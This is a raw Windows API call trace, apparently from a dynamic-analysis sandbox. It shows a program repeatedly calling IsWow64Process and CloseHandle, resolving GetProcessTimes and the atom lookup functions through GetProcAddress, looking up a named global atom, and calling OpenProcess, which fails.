	[0137.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.339] CloseHandle (hObject=0x2dc) returned 1
	[0137.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.340] CloseHandle (hObject=0x2dc) returned 1
	[0137.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.340] CloseHandle (hObject=0x2dc) returned 1
	[0137.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.340] CloseHandle (hObject=0x2dc) returned 1
	[0137.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.340] CloseHandle (hObject=0x2dc) returned 1
	[0137.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.341] CloseHandle (hObject=0x2dc) returned 1
	[0137.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.341] CloseHandle (hObject=0x2dc) returned 1
	[0137.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.341] CloseHandle (hObject=0x2dc) returned 1
	[0137.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.341] CloseHandle (hObject=0x2dc) returned 1
	[0137.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.342] CloseHandle (hObject=0x2dc) returned 1
	[0137.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.342] CloseHandle (hObject=0x2dc) returned 1
	[0137.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.342] CloseHandle (hObject=0x2dc) returned 1
	[0137.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.342] CloseHandle (hObject=0x2dc) returned 1
	[0137.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.343] CloseHandle (hObject=0x2dc) returned 1
	[0137.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.343] CloseHandle (hObject=0x2dc) returned 1
	[0137.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.343] CloseHandle (hObject=0x2dc) returned 1
	[0137.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.343] CloseHandle (hObject=0x2dc) returned 1
	[0137.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.344] CloseHandle (hObject=0x2dc) returned 1
	[0137.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.344] CloseHandle (hObject=0x2dc) returned 1
	[0137.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.344] CloseHandle (hObject=0x2dc) returned 1
	[0137.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.344] CloseHandle (hObject=0x2dc) returned 1
	[0137.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.345] CloseHandle (hObject=0x2dc) returned 1
	[0137.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.345] CloseHandle (hObject=0x2dc) returned 1
	[0137.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.345] CloseHandle (hObject=0x2dc) returned 1
	[0137.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.345] CloseHandle (hObject=0x2dc) returned 1
	[0137.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.346] CloseHandle (hObject=0x2dc) returned 1
	[0137.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.346] CloseHandle (hObject=0x2dc) returned 1
	[0137.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.346] CloseHandle (hObject=0x2dc) returned 1
	[0137.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.346] CloseHandle (hObject=0x2dc) returned 1
	[0137.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.347] CloseHandle (hObject=0x2dc) returned 1
	[0137.347] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.347] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.347] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.348] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.348] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.348] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.348] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.348] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.348] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.348] CloseHandle (hObject=0x2dc) returned 1
	[0137.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.349] CloseHandle (hObject=0x2dc) returned 1
	[0137.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.349] CloseHandle (hObject=0x2dc) returned 1
	[0137.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.349] CloseHandle (hObject=0x2dc) returned 1
	[0137.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.350] CloseHandle (hObject=0x2dc) returned 1
	[0137.350] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.350] CloseHandle (hObject=0x2dc) returned 1
	[0137.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.389] CloseHandle (hObject=0x2dc) returned 1
	[0137.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.390] CloseHandle (hObject=0x2dc) returned 1
	[0137.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.390] CloseHandle (hObject=0x2dc) returned 1
	[0137.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.390] CloseHandle (hObject=0x2dc) returned 1
	[0137.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.390] CloseHandle (hObject=0x2dc) returned 1
	[0137.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.391] CloseHandle (hObject=0x2dc) returned 1
	[0137.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.391] CloseHandle (hObject=0x2dc) returned 1
	[0137.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.391] CloseHandle (hObject=0x2dc) returned 1
	[0137.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.391] CloseHandle (hObject=0x2dc) returned 1
	[0137.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.392] CloseHandle (hObject=0x2dc) returned 1
	[0137.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.392] CloseHandle (hObject=0x2dc) returned 1
	[0137.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.392] CloseHandle (hObject=0x2dc) returned 1
	[0137.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.392] CloseHandle (hObject=0x2dc) returned 1
	[0137.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.393] CloseHandle (hObject=0x2dc) returned 1
	[0137.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.393] CloseHandle (hObject=0x2dc) returned 1
	[0137.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.393] CloseHandle (hObject=0x2dc) returned 1
	[0137.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.393] CloseHandle (hObject=0x2dc) returned 1
	[0137.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.394] CloseHandle (hObject=0x2dc) returned 1
	[0137.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.394] CloseHandle (hObject=0x2dc) returned 1
	[0137.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.394] CloseHandle (hObject=0x2dc) returned 1
	[0137.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.395] CloseHandle (hObject=0x2dc) returned 1
	[0137.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.395] CloseHandle (hObject=0x2dc) returned 1
	[0137.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.395] CloseHandle (hObject=0x2dc) returned 1
	[0137.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.396] CloseHandle (hObject=0x2dc) returned 1
	[0137.396] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.396] CloseHandle (hObject=0x2dc) returned 1
	[0137.396] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.396] CloseHandle (hObject=0x2dc) returned 1
	[0137.396] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.396] CloseHandle (hObject=0x2dc) returned 1
	[0137.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.397] CloseHandle (hObject=0x2dc) returned 1
	[0137.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.397] CloseHandle (hObject=0x2dc) returned 1
	[0137.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.397] CloseHandle (hObject=0x2dc) returned 1
	[0137.398] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.398] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.398] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.398] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.399] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.399] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.399] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.399] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.399] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.399] CloseHandle (hObject=0x2dc) returned 1
	[0137.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.400] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.400] CloseHandle (hObject=0x2dc) returned 1
	[0137.400] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.400] CloseHandle (hObject=0x2dc) returned 1
	[0137.400] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.401] CloseHandle (hObject=0x2dc) returned 1
	[0137.401] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.401] CloseHandle (hObject=0x2dc) returned 1
	[0137.401] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.401] CloseHandle (hObject=0x2dc) returned 1
	[0137.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.434] CloseHandle (hObject=0x2dc) returned 1
	[0137.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.435] CloseHandle (hObject=0x2dc) returned 1
	[0137.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.435] CloseHandle (hObject=0x2dc) returned 1
	[0137.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.435] CloseHandle (hObject=0x2dc) returned 1
	[0137.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.435] CloseHandle (hObject=0x2dc) returned 1
	[0137.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.436] CloseHandle (hObject=0x2dc) returned 1
	[0137.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.436] CloseHandle (hObject=0x2dc) returned 1
	[0137.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.436] CloseHandle (hObject=0x2dc) returned 1
	[0137.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.436] CloseHandle (hObject=0x2dc) returned 1
	[0137.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.437] CloseHandle (hObject=0x2dc) returned 1
	[0137.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.437] CloseHandle (hObject=0x2dc) returned 1
	[0137.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.437] CloseHandle (hObject=0x2dc) returned 1
	[0137.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.437] CloseHandle (hObject=0x2dc) returned 1
	[0137.437] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.437] CloseHandle (hObject=0x2dc) returned 1
	[0137.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.438] CloseHandle (hObject=0x2dc) returned 1
	[0137.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.438] CloseHandle (hObject=0x2dc) returned 1
	[0137.438] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.438] CloseHandle (hObject=0x2dc) returned 1
	[0137.439] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.439] CloseHandle (hObject=0x2dc) returned 1
	[0137.439] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.439] CloseHandle (hObject=0x2dc) returned 1
	[0137.439] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.439] CloseHandle (hObject=0x2dc) returned 1
	[0137.439] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.439] CloseHandle (hObject=0x2dc) returned 1
	[0137.440] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.440] CloseHandle (hObject=0x2dc) returned 1
	[0137.440] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.440] CloseHandle (hObject=0x2dc) returned 1
	[0137.440] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.440] CloseHandle (hObject=0x2dc) returned 1
	[0137.440] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.440] CloseHandle (hObject=0x2dc) returned 1
	[0137.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.441] CloseHandle (hObject=0x2dc) returned 1
	[0137.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.441] CloseHandle (hObject=0x2dc) returned 1
	[0137.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.441] CloseHandle (hObject=0x2dc) returned 1
	[0137.441] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.441] CloseHandle (hObject=0x2dc) returned 1
	[0137.442] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.442] CloseHandle (hObject=0x2dc) returned 1
	[0137.442] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.442] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.442] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.443] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.443] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.443] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.443] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.443] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.443] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.443] CloseHandle (hObject=0x2dc) returned 1
	[0137.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.444] CloseHandle (hObject=0x2dc) returned 1
	[0137.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.444] CloseHandle (hObject=0x2dc) returned 1
	[0137.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.444] CloseHandle (hObject=0x2dc) returned 1
	[0137.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.444] CloseHandle (hObject=0x2dc) returned 1
	[0137.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.445] CloseHandle (hObject=0x2dc) returned 1
	[0137.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.478] CloseHandle (hObject=0x2dc) returned 1
	[0137.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.479] CloseHandle (hObject=0x2dc) returned 1
	[0137.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.479] CloseHandle (hObject=0x2dc) returned 1
	[0137.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.479] CloseHandle (hObject=0x2dc) returned 1
	[0137.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.479] CloseHandle (hObject=0x2dc) returned 1
	[0137.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.479] CloseHandle (hObject=0x2dc) returned 1
	[0137.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.480] CloseHandle (hObject=0x2dc) returned 1
	[0137.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.480] CloseHandle (hObject=0x2dc) returned 1
	[0137.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.480] CloseHandle (hObject=0x2dc) returned 1
	[0137.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.480] CloseHandle (hObject=0x2dc) returned 1
	[0137.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.481] CloseHandle (hObject=0x2dc) returned 1
	[0137.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.481] CloseHandle (hObject=0x2dc) returned 1
	[0137.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.481] CloseHandle (hObject=0x2dc) returned 1
	[0137.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.481] CloseHandle (hObject=0x2dc) returned 1
	[0137.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.482] CloseHandle (hObject=0x2dc) returned 1
	[0137.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.482] CloseHandle (hObject=0x2dc) returned 1
	[0137.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.482] CloseHandle (hObject=0x2dc) returned 1
	[0137.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.482] CloseHandle (hObject=0x2dc) returned 1
	[0137.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.483] CloseHandle (hObject=0x2dc) returned 1
	[0137.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.483] CloseHandle (hObject=0x2dc) returned 1
	[0137.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.483] CloseHandle (hObject=0x2dc) returned 1
	[0137.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.483] CloseHandle (hObject=0x2dc) returned 1
	[0137.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.484] CloseHandle (hObject=0x2dc) returned 1
	[0137.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.484] CloseHandle (hObject=0x2dc) returned 1
	[0137.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.484] CloseHandle (hObject=0x2dc) returned 1
	[0137.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.484] CloseHandle (hObject=0x2dc) returned 1
	[0137.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.485] CloseHandle (hObject=0x2dc) returned 1
	[0137.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.485] CloseHandle (hObject=0x2dc) returned 1
	[0137.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.485] CloseHandle (hObject=0x2dc) returned 1
	[0137.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.485] CloseHandle (hObject=0x2dc) returned 1
	[0137.486] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.486] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.486] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.486] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.486] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.487] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.487] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.487] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.487] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.487] CloseHandle (hObject=0x2dc) returned 1
	[0137.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
